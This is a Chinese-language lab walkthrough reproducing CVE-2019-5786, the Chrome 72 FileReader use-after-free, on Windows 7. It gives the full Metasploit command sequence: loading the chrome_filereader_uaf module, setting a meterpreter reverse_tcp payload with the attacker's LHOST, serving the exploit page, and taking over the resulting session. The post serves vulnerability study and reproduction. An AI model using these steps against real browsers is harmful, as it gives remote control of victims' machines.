CVE-2019-5786漏洞复现

漏洞影响范围:
CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。

环境

kali
win7 x86
Google_Chrome_(32bit)_v72.0.3626.119

复现

kali启动msf,搜索chrome_filereader利用模块

root@kali:~# msfconsole -q
msf5 > search chrome_filereader

CVE-2019-5786漏洞复现_第1张图片选择模块,查看模块信息

msf5 > use exploit/windows/browser/chrome_filereader_uaf
msf5 exploit(windows/browser/chrome_filereader_uaf) > info

CVE-2019-5786漏洞复现_第2张图片
漏洞介绍
CVE-2019-5786漏洞复现_第3张图片
选择payload

msf5 exploit(windows/browser/chrome_filereader_uaf) > set payload windows/meterpreter/reverse_tcp

CVE-2019-5786漏洞复现_第4张图片
设置payload参数,LHOST设置为kali ip

msf5 exploit(windows/browser/chrome_filereader_uaf) > set URIPATH /
msf5 exploit(windows/browser/chrome_filereader_uaf) > set LHOST 192.168.159.141

CVE-2019-5786漏洞复现_第5张图片创建服务
CVE-2019-5786漏洞复现_第6张图片
在win7 x86中打开Google Chrome文件位置
CVE-2019-5786漏洞复现_第7张图片
地址栏输入cmd,回车。出现当前目录下的终端
执行语句(以沙箱关闭的状态执行chrome.exe)

C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox

在这里插入图片描述
在通过此命令打开的chrome浏览器地址栏中输入地址:
http://192.168.159.141:8080
在这里插入图片描述
kali成功获得session
CVE-2019-5786漏洞复现_第8张图片
选择生成的session

msf5 exploit(windows/browser/chrome_filereader_uaf) > sessions 1

在这里插入图片描述
查看当前系统信息,用户权限

meterpreter > sysinfo
meterpreter > getuid

CVE-2019-5786漏洞复现_第9张图片

技术无罪,请勿用于恶意用途。

你可能感兴趣的:(漏洞分析复现)